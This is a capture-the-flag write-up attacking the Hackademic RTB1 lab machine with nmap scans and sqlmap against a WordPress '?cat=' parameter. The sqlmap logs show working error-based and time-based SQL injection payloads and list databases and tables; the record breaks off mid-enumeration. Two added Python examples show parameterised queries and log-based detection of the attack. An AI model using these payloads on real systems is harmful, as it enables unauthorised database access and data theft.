HackademicRTB1

Host discovery

nmap -sn 192.168.65.0/24
Starting Nmap 7.94 ( https://nmap.org ) at 2024-01-16 15:10 中国标准时间
Nmap scan report for 192.168.65.1
Host is up (0.0020s latency).
MAC Address: 00:50:56:C0:00:08 (VMware)
Nmap scan report for 192.168.65.2
Host is up (0.0011s latency).
MAC Address: 00:50:56:EB:B8:29 (VMware)
Nmap scan report for 192.168.65.135
Host is up (0.0020s latency).
MAC Address: 00:0C:29:70:82:CA (VMware)
Nmap scan report for 192.168.65.254
Host is up (0.00097s latency).
MAC Address: 00:50:56:FD:72:65 (VMware)
Nmap scan report for 192.168.65.128
Host is up.
Nmap done: 256 IP addresses (5 hosts up) scanned in 2.14 seconds

Port scan

nmap --min-rate 10000 -p- 192.168.65.135 -oA nmapscan/ports
Starting Nmap 7.94 ( https://nmap.org ) at 2024-01-16 15:12 中国标准时间
Nmap scan report for 192.168.65.135
Host is up (0.048s latency).
Not shown: 65456 filtered tcp ports (no-response), 77 filtered tcp ports (host-prohibited)
PORT   STATE  SERVICE
22/tcp closed ssh
80/tcp open   http
MAC Address: 00:0C:29:70:82:CA (VMware)

Nmap done: 1 IP address (1 host up) scanned in 72.20 seconds

TCP

nmap -sT -sV -sC -O -p80 192.168.65.135 -oA nmapscan/detail
Starting Nmap 7.94 ( https://nmap.org ) at 2024-01-16 15:14 中国标准时间
Nmap scan report for 192.168.65.135
Host is up (0.00081s latency).

PORT   STATE SERVICE VERSION
80/tcp open  http    Apache httpd 2.2.15 ((Fedora))
| http-methods:
|_  Potentially risky methods: TRACE
|_http-title: Hackademic.RTB1
|_http-server-header: Apache/2.2.15 (Fedora)
MAC Address: 00:0C:29:70:82:CA (VMware)
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: media device|general purpose|storage-misc|webcam|firewall
Running (JUST GUESSING): LG embedded (97%), Linux 2.6.X|3.X|4.X (97%), Iomega embedded (91%), Tandberg embedded (91%), DirecTV embedded (89%), Check Point embedded (89%), Infomir embedded (88%)
OS CPE: cpe:/o:linux:linux_kernel:2.6 cpe:/h:iomega:ix4-200d cpe:/o:linux:linux_kernel:2.6.22 cpe:/h:directv:hr34 cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4 cpe:/h:infomir:mag-250
Aggressive OS guesses: LG Bp430 Blu-ray Player (97%), Linux 2.6.22 - 2.6.36 (97%), Linux 2.6.32 (94%), Linux 2.6.24 - 2.6.36 (93%), Iomega StorCenter ix4-200d (Linux 2.6.31) (91%), Linux 2.6.23 - 2.6.38 (91%), Linux 2.6.31 - 2.6.35 (91%), Linux 2.6.9 - 2.6.18 (91%), Linux 2.6.9 - 2.6.27 (91%), Linux 2.6.39 (91%)
No exact OS matches for host (test conditions non-ideal).
Network Distance: 1 hop

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 16.18 seconds

UDP

nmap -sU -p80 192.168.65.135 -oA nmapscan/udp
Starting Nmap 7.94 ( https://nmap.org ) at 2024-01-16 15:17 中国标准时间
Nmap scan report for 192.168.65.135
Host is up (0.00s latency).

PORT   STATE    SERVICE
80/udp filtered http
MAC Address: 00:0C:29:70:82:CA (VMware)

Nmap done: 1 IP address (1 host up) scanned in 0.18 seconds

Nmap vulnerability scan

nmap --script=vuln -p80 192.168.65.135 -oA nmapscan/vuln
Starting Nmap 7.94 ( https://nmap.org ) at 2024-01-16 15:17 中国标准时间
Pre-scan script results:
| broadcast-avahi-dos:
|   Discovered hosts:
|     224.0.0.251
|   After NULL UDP avahi packet DoS (CVE-2011-1002).
|_  Hosts are all up (not vulnerable).
Nmap scan report for 192.168.65.135
Host is up (0.00s latency).

PORT   STATE SERVICE
80/tcp open  http
|_http-trace: TRACE is enabled
|_http-csrf: Couldn't find any CSRF vulnerabilities.
| http-slowloris-check:
|   VULNERABLE:
|   Slowloris DOS attack
|     State: LIKELY VULNERABLE
|     IDs:  CVE:CVE-2007-6750
|       Slowloris tries to keep many connections to the target web server open and hold
|       them open as long as possible.  It accomplishes this by opening connections to
|       the target web server and sending a partial request. By doing so, it starves
|       the http server's resources causing Denial Of Service.
|
|     Disclosure date: 2009-09-17
|     References:
|       http://ha.ckers.org/slowloris/
|_      https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-6750
| http-vuln-cve2011-3192:
|   VULNERABLE:
|   Apache byterange filter DoS
|     State: VULNERABLE
|     IDs:  CVE:CVE-2011-3192  BID:49303
|       The Apache web server is vulnerable to a denial of service attack when numerous
|       overlapping byte ranges are requested.
|     Disclosure date: 2011-08-19
|     References:
|       https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-3192
|       https://www.tenable.com/plugins/nessus/55976
|       https://seclists.org/fulldisclosure/2011/Aug/175
|_      https://www.securityfocus.com/bid/49303
|_http-dombased-xss: Couldn't find any DOM based XSS.
|_http-stored-xss: Couldn't find any stored XSS vulnerabilities.
| http-enum:
|_  /icons/: Potentially interesting folder w/ directory listing
MAC Address: 00:0C:29:70:82:CA (VMware)

Nmap done: 1 IP address (1 host up) scanned in 194.93 seconds

Attack path

Web penetration testing

Accessing the HTTP service

Clicking the "target" hyperlink redirects to http://192.168.65.135/Hackademic_RTB1/, and that page carries two more links:

  • http://192.168.65.135/Hackademic_RTB1/?cat=1
  • http://192.168.65.135/Hackademic_RTB1/?p=9#comments

On a whim, change the parameter to ?cat=key.txt:

curl http://192.168.65.135/Hackademic_RTB1/?cat=key.txt
curl : Hackademic.RTB1
The First Realistic Hackademic Challenge (root this box).
Not Found
Search

Search

Pages
WordPress database error: [Unknown column 'key.txt' in 'where clause']
SELECT * FROM wp_categories WHERE cat_ID = key.txt LIMIT 1
Archives
January 2011
Categories
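
Why that one request leaked the whole statement: the value of `?cat=` is spliced into the SQL text, so `key.txt` is parsed as an identifier and the database error, query included, is echoed to the browser. The following is an added example, not the target's WordPress code (which is PHP on MySQL): a Python/SQLite stand-in with a constructed `wp_categories` table and hypothetical `get_category_unsafe` / `get_category_safe` functions, showing the string-built query beside the hardened form (type check, bound parameter, no driver message returned to the client).

```python
import sqlite3

# Constructed stand-in for the wp_categories table named in the page's error
# message (the real target runs WordPress on MySQL; SQLite is used here so the
# example runs offline).
SCHEMA = """
CREATE TABLE wp_categories (cat_ID INTEGER PRIMARY KEY, cat_name TEXT);
INSERT INTO wp_categories VALUES (1, 'Uncategorized');
"""


def open_db():
    conn = sqlite3.connect(":memory:")
    conn.executescript(SCHEMA)
    return conn


def get_category_unsafe(conn, cat):
    """Hypothetical lookup that builds the query the way the page's error shows:
    the raw ?cat= value is pasted into the SQL text, so the parser treats it as
    SQL (an identifier, an expression) rather than as data."""
    sql = "SELECT * FROM wp_categories WHERE cat_ID = %s LIMIT 1" % cat
    try:
        return {"sql": sql, "row": conn.execute(sql).fetchone(), "error": None}
    except sqlite3.Error as exc:
        # The original application echoes this message, SQL included, to the
        # browser; that is what turned a plain 500 into a confirmed injection point.
        return {"sql": sql, "row": None, "error": str(exc)}


def get_category_safe(conn, cat):
    """Hardened lookup: enforce the expected type first (a category id is an
    integer), then bind it as a parameter so the value can never change the
    shape of the statement. Driver errors are not surfaced to the caller."""
    try:
        cat_id = int(cat)
    except (TypeError, ValueError):
        return {"row": None, "error": "invalid category id"}
    try:
        row = conn.execute(
            "SELECT * FROM wp_categories WHERE cat_ID = ? LIMIT 1", (cat_id,)
        ).fetchone()
    except sqlite3.Error:
        # Log server-side in a real deployment; never echo the SQL to the client.
        return {"row": None, "error": "lookup failed"}
    return {"row": row, "error": None}


if __name__ == "__main__":
    db = open_db()
    for value in ("1", "key.txt"):
        print("unsafe", value, get_category_unsafe(db, value))
        print("safe  ", value, get_category_safe(db, value))
```

The unsafe variant reproduces the page's symptom (a parse-level error that names `key.txt` as a column); the safe variant rejects the same input before any SQL is built, and even a genuine database fault would reach the client only as a generic message.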

The error message exposes the SQL statement, so the URL goes straight into sqlmap:

sqlmap -u http://192.168.65.135/Hackademic_RTB1/?cat=key.txt --level=2
D:\Global\apps\sqlmap\current>python3 "sqlmap.py" -u http://192.168.65.135/Hackademic_RTB1/?cat=key.txt --level=2
__H__
___ ___[']_____ ___ ___  {1.7.9#stable}
|_ -| . [']     | .'| . |
|___|_  [(]_|_|_|__,|  _|
|_|V...       |_|   https://sqlmap.org
[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program
[*] starting @ 15:36:28 /2024-01-16/
[15:36:28] [INFO] testing connection to the target URL
[15:36:28] [WARNING] the web server responded with an HTTP error code (500) which could interfere with the results of the tests
[15:36:28] [INFO] checking if the target is protected by some kind of WAF/IPS
[15:36:28] [INFO] testing if the target URL content is stable
[15:36:29] [INFO] target URL content is stable
[15:36:29] [INFO] testing if GET parameter 'cat' is dynamic
[15:36:29] [INFO] GET parameter 'cat' appears to be dynamic
[15:36:29] [INFO] heuristic (basic) test shows that GET parameter 'cat' might be injectable (possible DBMS: 'MySQL')
[15:36:29] [INFO] testing for SQL injection on GET parameter 'cat'
it looks like the back-end DBMS is 'MySQL'. Do you want to skip test payloads specific for other DBMSes? [Y/n]
for the remaining tests, do you want to include all tests for 'MySQL' extending provided level (2) and risk (1) values? [Y/n]
[15:36:39] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[15:36:39] [WARNING] reflective value(s) found and filtering out
[15:36:39] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause (subquery - comment)'
[15:36:40] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause (comment)'
[15:36:40] [INFO] testing 'Boolean-based blind - Parameter replace (original value)'
[15:36:40] [INFO] testing 'Boolean-based blind - Parameter replace (DUAL)'
[15:36:40] [INFO] testing 'Boolean-based blind - Parameter replace (CASE)'
[15:36:40] [INFO] testing 'Generic inline queries'
[15:36:40] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause (MySQL comment)'
[15:36:41] [INFO] testing 'OR boolean-based blind - WHERE or HAVING clause (MySQL comment)'
[15:36:42] [INFO] testing 'OR boolean-based blind - WHERE or HAVING clause (NOT - MySQL comment)'
[15:36:43] [INFO] testing 'MySQL RLIKE boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause'
[15:36:45] [INFO] testing 'MySQL AND boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause (MAKE_SET)'
[15:36:47] [INFO] testing 'MySQL OR boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause (MAKE_SET)'
[15:36:48] [INFO] testing 'MySQL AND boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause (ELT)'
[15:36:50] [INFO] testing 'MySQL OR boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause (ELT)'
[15:36:52] [INFO] testing 'MySQL AND boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause (bool*int)'
[15:36:54] [INFO] testing 'MySQL OR boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause (bool*int)'
[15:36:55] [INFO] testing 'MySQL boolean-based blind - Parameter replace (MAKE_SET)'
[15:36:55] [INFO] testing 'MySQL boolean-based blind - Parameter replace (MAKE_SET - original value)'
[15:36:55] [INFO] testing 'MySQL boolean-based blind - Parameter replace (ELT)'
[15:36:55] [INFO] testing 'MySQL boolean-based blind - Parameter replace (ELT - original value)'
[15:36:55] [INFO] testing 'MySQL boolean-based blind - Parameter replace (bool*int)'
[15:36:55] [INFO] testing 'MySQL boolean-based blind - Parameter replace (bool*int - original value)'
[15:36:55] [INFO] testing 'MySQL >= 5.0 boolean-based blind - ORDER BY, GROUP BY clause'
[15:36:56] [INFO] testing 'MySQL >= 5.0 boolean-based blind - ORDER BY, GROUP BY clause (original value)'
[15:36:56] [INFO] testing 'MySQL < 5.0 boolean-based blind - ORDER BY, GROUP BY clause'
[15:36:56] [INFO] testing 'MySQL < 5.0 boolean-based blind - ORDER BY, GROUP BY clause (original value)'
[15:36:56] [INFO] testing 'MySQL >= 5.0 boolean-based blind - Stacked queries'
[15:36:57] [INFO] testing 'MySQL < 5.0 boolean-based blind - Stacked queries'
[15:36:57] [INFO] testing 'MySQL >= 5.5 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (BIGINT UNSIGNED)'
[15:36:58] [INFO] testing 'MySQL >= 5.5 OR error-based - WHERE or HAVING clause (BIGINT UNSIGNED)'
[15:36:59] [INFO] testing 'MySQL >= 5.5 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (EXP)'
[15:37:00] [INFO] testing 'MySQL >= 5.5 OR error-based - WHERE or HAVING clause (EXP)'
[15:37:02] [INFO] testing 'MySQL >= 5.6 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (GTID_SUBSET)'
[15:37:03] [INFO] testing 'MySQL >= 5.6 OR error-based - WHERE or HAVING clause (GTID_SUBSET)'
[15:37:04] [INFO] testing 'MySQL >= 5.7.8 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (JSON_KEYS)'
[15:37:05] [INFO] testing 'MySQL >= 5.7.8 OR error-based - WHERE or HAVING clause (JSON_KEYS)'
[15:37:07] [INFO] GET parameter 'cat' is 'MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)' injectable
[15:37:07] [INFO] testing 'MySQL inline queries'
[15:37:07] [INFO] testing 'MySQL >= 5.0.12 stacked queries (comment)'
[15:37:07] [INFO] testing 'MySQL >= 5.0.12 stacked queries'
[15:37:07] [INFO] testing 'MySQL >= 5.0.12 stacked queries (query SLEEP - comment)'
[15:37:07] [INFO] testing 'MySQL >= 5.0.12 stacked queries (query SLEEP)'
[15:37:07] [INFO] testing 'MySQL < 5.0.12 stacked queries (BENCHMARK - comment)'
[15:37:07] [INFO] testing 'MySQL < 5.0.12 stacked queries (BENCHMARK)'
[15:37:07] [INFO] testing 'MySQL >= 5.0.12 AND time-based blind (query SLEEP)'
[15:37:27] [INFO] GET parameter 'cat' appears to be 'MySQL >= 5.0.12 AND time-based blind (query SLEEP)' injectable
[15:37:27] [INFO] testing 'Generic UNION query (NULL) - 1 to 20 columns'
[15:37:27] [INFO] automatically extending ranges for UNION query injection technique tests as there is at least one other (potential) technique found
[15:37:27] [INFO] testing 'Generic UNION query (NULL) - 21 to 40 columns'
[15:37:28] [INFO] testing 'MySQL UNION query (NULL) - 1 to 20 columns'
[15:37:28] [INFO] testing 'MySQL UNION query (random number) - 1 to 20 columns'
[15:37:29] [INFO] testing 'MySQL UNION query (NULL) - 21 to 40 columns'
[15:37:29] [INFO] testing 'MySQL UNION query (random number) - 21 to 40 columns'
[15:37:30] [INFO] testing 'MySQL UNION query (NULL) - 41 to 60 columns'
[15:37:30] [INFO] testing 'MySQL UNION query (random number) - 41 to 60 columns'
[15:37:31] [INFO] testing 'MySQL UNION query (NULL) - 61 to 80 columns'
[15:37:31] [INFO] testing 'MySQL UNION query (random number) - 61 to 80 columns'
[15:37:32] [INFO] testing 'MySQL UNION query (NULL) - 81 to 100 columns'
[15:37:32] [INFO] testing 'MySQL UNION query (random number) - 81 to 100 columns'
GET parameter 'cat' is vulnerable. Do you want to keep testing the others (if any)? [y/N]
sqlmap identified the following injection point(s) with a total of 1468 HTTP(s) requests:
---
Parameter: cat (GET)
Type: error-based
Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
Payload: cat=key.txt AND (SELECT 5987 FROM(SELECT COUNT(*),CONCAT(0x716a767171,(SELECT (ELT(5987=5987,1))),0x717a716271,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)
Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: cat=key.txt AND (SELECT 8686 FROM (SELECT(SLEEP(5)))iqzp)
---
[15:37:39] [INFO] the back-end DBMS is MySQL
web server operating system: Linux Fedora 13 (Goddard)
web application technology: Apache 2.2.15, PHP 5.3.3
back-end DBMS: MySQL >= 5.0
[15:37:39] [WARNING] HTTP error codes detected during run:
500 (Internal Server Error) - 1483 times
[15:37:39] [INFO] fetched data logged to text files under 'C:\Users\Administrator\AppData\Local\sqlmap\output\192.168.65.135'
[*] ending @ 15:37:39 /2024-01-16/
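
From the server side, the run above is loud: 1468 requests against one parameter, 1483 HTTP 500 responses, a `sqlmap/...` User-Agent, and query strings carrying the FLOOR/RAND/GROUP BY and SLEEP() constructs sqlmap printed as its payloads. The following detection pass over Apache combined-format access log lines is an added example, not part of the original writeup: the sample lines are constructed (documentation IP addresses, shortened query strings), `ERROR_BURST_THRESHOLD` is an assumed value, and `parse_line`, `classify` and `analyze` are hypothetical names.

```python
import re
from collections import Counter
from urllib.parse import parse_qsl, urlsplit

# Apache "combined" LogFormat: %h %l %u %t "%r" %>s %b "%{Referer}i" "%{User-Agent}i"
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<path>\S+) [^"]*" '
    r'(?P<status>\d{3}) (?P<size>\S+) "(?P<ref>[^"]*)" "(?P<ua>[^"]*)"$'
)

# Signatures of the techniques sqlmap reported above, matched against the
# URL-decoded value of every query parameter.
SQLI_PATTERNS = [
    ("error-based (FLOOR/RAND/GROUP BY)",
     re.compile(r"FLOOR\s*\(\s*RAND\s*\(.*GROUP\s+BY", re.I | re.S)),
    ("schema enumeration", re.compile(r"\bINFORMATION_SCHEMA\b", re.I)),
    ("time-based (SLEEP/BENCHMARK)", re.compile(r"\b(SLEEP|BENCHMARK)\s*\(", re.I)),
    ("union-based", re.compile(r"\bUNION\b.{0,20}\bSELECT\b", re.I | re.S)),
]

# Assumed threshold: this many 5xx responses from one client is worth a look.
ERROR_BURST_THRESHOLD = 3

# Constructed sample lines (documentation addresses, not the lab host). The
# query strings reproduce the shape of the payloads sqlmap printed above.
SAMPLE_LOG = """\
198.51.100.7 - - [16/Jan/2024:15:36:10 +0800] "GET /Hackademic_RTB1/?cat=1 HTTP/1.1" 200 5120 "-" "Mozilla/5.0"
198.51.100.7 - - [16/Jan/2024:15:36:28 +0800] "GET /Hackademic_RTB1/?cat=key.txt HTTP/1.1" 500 2900 "-" "curl/8.4.0"
198.51.100.7 - - [16/Jan/2024:15:37:07 +0800] "GET /Hackademic_RTB1/?cat=key.txt%20AND%20(SELECT%205987%20FROM(SELECT%20COUNT(*),CONCAT(0x71,(SELECT%20(ELT(5987=5987,1))),0x71,FLOOR(RAND(0)*2))x%20FROM%20INFORMATION_SCHEMA.PLUGINS%20GROUP%20BY%20x)a) HTTP/1.1" 500 2950 "-" "sqlmap/1.7.9#stable (https://sqlmap.org)"
198.51.100.7 - - [16/Jan/2024:15:37:27 +0800] "GET /Hackademic_RTB1/?cat=key.txt%20AND%20(SELECT%208686%20FROM%20(SELECT(SLEEP(5)))iqzp) HTTP/1.1" 500 2900 "-" "sqlmap/1.7.9#stable (https://sqlmap.org)"
203.0.113.5 - - [16/Jan/2024:15:38:01 +0800] "GET /Hackademic_RTB1/?p=9 HTTP/1.1" 200 6100 "-" "Mozilla/5.0"
"""


def parse_line(line):
    """Return a dict for one combined-format line, or None if it does not parse."""
    m = LOG_RE.match(line)
    if not m:
        return None
    rec = m.groupdict()
    rec["status"] = int(rec["status"])
    query = urlsplit(rec["path"]).query
    # parse_qsl percent-decodes values, so %20 and + become spaces before matching.
    rec["params"] = dict(parse_qsl(query, keep_blank_values=True))
    return rec


def classify(rec):
    """Names of the signatures a parsed request matches (empty list if none)."""
    findings = []
    if "sqlmap" in rec["ua"].lower():
        findings.append("sqlmap user-agent")
    for name, pattern in SQLI_PATTERNS:
        if any(pattern.search(value) for value in rec["params"].values()):
            findings.append(name)
    return findings


def analyze(log_text):
    """Scan log text; return per-request hits and clients with 5xx bursts."""
    hits = []
    errors_by_ip = Counter()
    for line in log_text.splitlines():
        rec = parse_line(line)
        if rec is None:
            continue
        if 500 <= rec["status"] < 600:
            errors_by_ip[rec["ip"]] += 1
        findings = classify(rec)
        if findings:
            hits.append({"ip": rec["ip"], "ts": rec["ts"],
                         "params": sorted(rec["params"]), "findings": findings})
    bursts = {ip: n for ip, n in errors_by_ip.items() if n >= ERROR_BURST_THRESHOLD}
    return {"hits": hits, "error_bursts": bursts}


if __name__ == "__main__":
    report = analyze(SAMPLE_LOG)
    for hit in report["hits"]:
        print(hit["ts"], hit["ip"], hit["params"], ", ".join(hit["findings"]))
    print("5xx bursts:", report["error_bursts"])
```

The User-Agent check is the cheapest signal and the easiest for an attacker to change, which is why the pass also matches on the decoded parameter values and counts 5xx responses per client: the error-based technique only works because every probe makes the application fail, so a single client producing hundreds of 500s against one parameter is itself the indicator, whatever the request headers say.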
sqlmap -u http://192.168.65.135/Hackademic_RTB1/?cat=key.txt --level=2 --dbs
D:\Global\apps\sqlmap\current>python3 "sqlmap.py" -u http://192.168.65.135/Hackademic_RTB1/?cat=key.txt --level=2 --dbs
___
__H__
___ ___["]_____ ___ ___  {1.7.9#stable}
|_ -| . [(]     | .'| . |
|___|_  [.]_|_|_|__,|  _|
|_|V...       |_|   https://sqlmap.org
[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program
[*] starting @ 15:38:50 /2024-01-16/
[15:38:51] [INFO] resuming back-end DBMS 'mysql'
[15:38:51] [INFO] testing connection to the target URL
[15:38:51] [WARNING] the web server responded with an HTTP error code (500) which could interfere with the results of the tests
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: cat (GET)
Type: error-based
Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
Payload: cat=key.txt AND (SELECT 5987 FROM(SELECT COUNT(*),CONCAT(0x716a767171,(SELECT (ELT(5987=5987,1))),0x717a716271,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)
Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: cat=key.txt AND (SELECT 8686 FROM (SELECT(SLEEP(5)))iqzp)
---
[15:38:51] [INFO] the back-end DBMS is MySQL
web server operating system: Linux Fedora 13 (Goddard)
web application technology: PHP 5.3.3, Apache 2.2.15
back-end DBMS: MySQL >= 5.0
[15:38:51] [INFO] fetching database names
[15:38:51] [WARNING] reflective value(s) found and filtering out
[15:38:51] [INFO] retrieved: 'information_schema'
[15:38:51] [INFO] retrieved: 'mysql'
[15:38:51] [INFO] retrieved: 'wordpress'
available databases [3]:
[*] information_schema
[*] mysql
[*] wordpress
[15:38:51] [WARNING] HTTP error codes detected during run:
500 (Internal Server Error) - 5 times
[15:38:51] [INFO] fetched data logged to text files under 'C:\Users\Administrator\AppData\Local\sqlmap\output\192.168.65.135'
[*] ending @ 15:38:51 /2024-01-16/
sqlmap -u http://192.168.65.135/Hackademic_RTB1/?cat=key.txt --level=2 --current-db
D:\Global\apps\sqlmap\current>python3 "sqlmap.py" -u http://192.168.65.135/Hackademic_RTB1/?cat=key.txt --level=2 --current-db
___
__H__
___ ___[']_____ ___ ___  {1.7.9#stable}
|_ -| . [,]     | .'| . |
|___|_  [.]_|_|_|__,|  _|
|_|V...       |_|   https://sqlmap.org
[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program
[*] starting @ 15:38:06 /2024-01-16/
[15:38:06] [INFO] resuming back-end DBMS 'mysql'
[15:38:06] [INFO] testing connection to the target URL
[15:38:06] [WARNING] the web server responded with an HTTP error code (500) which could interfere with the results of the tests
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: cat (GET)
Type: error-based
Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
Payload: cat=key.txt AND (SELECT 5987 FROM(SELECT COUNT(*),CONCAT(0x716a767171,(SELECT (ELT(5987=5987,1))),0x717a716271,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)
Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: cat=key.txt AND (SELECT 8686 FROM (SELECT(SLEEP(5)))iqzp)
---
[15:38:06] [INFO] the back-end DBMS is MySQL
web server operating system: Linux Fedora 13 (Goddard)
web application technology: Apache 2.2.15, PHP 5.3.3
back-end DBMS: MySQL >= 5.0
[15:38:06] [INFO] fetching current database
[15:38:06] [WARNING] reflective value(s) found and filtering out
[15:38:06] [INFO] retrieved: 'wordpress'
current database: 'wordpress'
[15:38:06] [WARNING] HTTP error codes detected during run:
500 (Internal Server Error) - 2 times
[15:38:06] [INFO] fetched data logged to text files under 'C:\Users\Administrator\AppData\Local\sqlmap\output\192.168.65.135'
[*] ending @ 15:38:06 /2024-01-16/
sqlmap -u http://192.168.65.135/Hackademic_RTB1/?cat=key.txt --level=2 --current-user
D:\Global\apps\sqlmap\current>python3 "sqlmap.py" -u http://192.168.65.135/Hackademic_RTB1/?cat=key.txt --level=2 --current-user
___
__H__
___ ___[)]_____ ___ ___  {1.7.9#stable}
|_ -| . [,]     | .'| . |
|___|_  [(]_|_|_|__,|  _|
|_|V...       |_|   https://sqlmap.org
[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program
[*] starting @ 15:37:58 /2024-01-16/
[15:37:59] [INFO] resuming back-end DBMS 'mysql'
[15:37:59] [INFO] testing connection to the target URL
[15:37:59] [WARNING] the web server responded with an HTTP error code (500) which could interfere with the results of the tests
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: cat (GET)
Type: error-based
Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
Payload: cat=key.txt AND (SELECT 5987 FROM(SELECT COUNT(*),CONCAT(0x716a767171,(SELECT (ELT(5987=5987,1))),0x717a716271,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)
Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: cat=key.txt AND (SELECT 8686 FROM (SELECT(SLEEP(5)))iqzp)
---
[15:37:59] [INFO] the back-end DBMS is MySQL
web server operating system: Linux Fedora 13 (Goddard)
web application technology: Apache 2.2.15, PHP 5.3.3
back-end DBMS: MySQL >= 5.0
[15:37:59] [INFO] fetching current user
[15:37:59] [WARNING] reflective value(s) found and filtering out
[15:37:59] [INFO] retrieved: 'root@localhost'
current user: 'root@localhost'
[15:37:59] [WARNING] HTTP error codes detected during run:
500 (Internal Server Error) - 2 times
[15:37:59] [INFO] fetched data logged to text files under 'C:\Users\Administrator\AppData\Local\sqlmap\output\192.168.65.135'
[*] ending @ 15:37:59 /2024-01-16/
sqlmap -u http://192.168.65.135/Hackademic_RTB1/?cat=key.txt --level=2 --tables
D:\Global\apps\sqlmap\current>python3 "sqlmap.py" -u http://192.168.65.135/Hackademic_RTB1/?cat=key.txt --level=2 --tables
___
__H__
___ ___[']_____ ___ ___  {1.7.9#stable}
|_ -| . ["]     | .'| . |
|___|_  [']_|_|_|__,|  _|
|_|V...       |_|   https://sqlmap.org
[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program
[*] starting @ 15:48:09 /2024-01-16/
[15:48:10] [INFO] resuming back-end DBMS 'mysql'
[15:48:10] [INFO] testing connection to the target URL
[15:48:10] [WARNING] the web server responded with an HTTP error code (500) which could interfere with the results of the tests
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: cat (GET)
Type: error-based
Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
Payload: cat=key.txt AND (SELECT 5987 FROM(SELECT COUNT(*),CONCAT(0x716a767171,(SELECT (ELT(5987=5987,1))),0x717a716271,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)
Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: cat=key.txt AND (SELECT 8686 FROM (SELECT(SLEEP(5)))iqzp)
---
[15:48:10] [INFO] the back-end DBMS is MySQL
web server operating system: Linux Fedora 13 (Goddard)
web application technology: PHP 5.3.3, Apache 2.2.15
back-end DBMS: MySQL >= 5.0
[15:48:10] [INFO] fetching database names
[15:48:10] [INFO] resumed: 'information_schema'
[15:48:10] [INFO] resumed: 'mysql'
[15:48:10] [INFO] resumed: 'wordpress'
[15:48:10] [INFO] fetching tables for databases: 'information_schema, mysql, wordpress'
[15:48:10] [WARNING] reflective value(s) found and filtering out
[15:48:10] [INFO] retrieved: 'information_schema'
[15:48:10] [INFO] retrieved: 'CHARACTER_SETS'
[15:48:10] [INFO] retrieved: 'information_schema'
[15:48:10] [INFO] retrieved: 'COLLATIONS'
[15:48:10] [INFO] retrieved: 'information_schema'
[15:48:10] [INFO] retrieved: 'COLLATION_CHARACTER_SET_APPLICABILITY'
[15:48:10] [INFO] retrieved: 'information_schema'
[15:48:10] [INFO] retrieved: 'COLUMNS'
[15:48:10] [INFO] retrieved: 'information_schema'
[15:48:10] [INFO] retrieved: 'COLUMN_PRIVILEGES'
[15:48:10] [INFO] retrieved: 'information_schema'
[15:48:10] [INFO] retrieved: 'ENGINES'
[15:48:10] [INFO] retrieved: 'information_schema'
